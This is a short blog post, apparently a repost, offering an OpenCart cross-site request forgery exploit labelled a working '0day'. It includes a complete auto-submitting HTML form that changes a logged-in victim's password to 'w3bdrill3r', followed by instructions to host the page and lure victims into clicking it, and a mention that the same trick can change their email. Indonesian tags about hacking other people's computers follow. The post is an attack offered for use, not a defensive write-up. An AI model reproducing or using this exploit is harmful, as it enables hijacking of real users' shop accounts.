» » » » Open Cart CSRF 0day (Working all versions)

Open Cart CSRF 0day (Working all versions)



I found CSRF in Open Cart CMS. Through this you can update victim's password.

Here is html form code

<SCRIPT LANGUAGE="JavaScript"><!--
setTimeout('document.test.submit()',1000);
//--></SCRIPT>

<form name="test" action="http://127.0.0.1/upload/index.php?

route=account/password" method="post">
<input name="password" value="w3bdrill3r" type="hidden">
<input name="confirm" value="w3bdrill3r" type="hidden">
<input value="Submit" type="submit">
</form>

Save above code as "OC.html" and replace 127.0.0.1 with victim's website. Now upload that OC.html to any host and send this link to victim. Just by a victim's click, his password will be changed as "w3bdrill3r". You can change victim's email too with that exploit. The JavaScript code will automatically call the submit button in the form so that victim will not be even needed to click on submit button. Its my 1st vulnerability i ever found in any CMS so i hope you will like it 

sumur : madleets
Tags : Cara untuk Meretas sebuah Komputer,trick Hack Komputer Super Jail,Cara Mematikan Komputer Orang Lain,Cara Mengendalikan Komputer Jarak Jauh,Cara Meretas Komputer Orang Lain,Cara Hack Komputer Orang Lain,Cara Meretas Komputer Orang dari Jarak Jauh,Cara memantau Komputer lain dengan Command Prompt,Cara hack komputer remote menggunakan IP,Trik Hack Komputer yang Sangat Berbahaya,Dasar-dasar Meretas,Dasar-dasar Hack,
Share this article please, on :
Share on fb Tweet Share on G+

0 Response to "Open Cart CSRF 0day (Working all versions)"

Post a Comment

Subscribe to: Post Comments (Atom)
Powered by Blogger.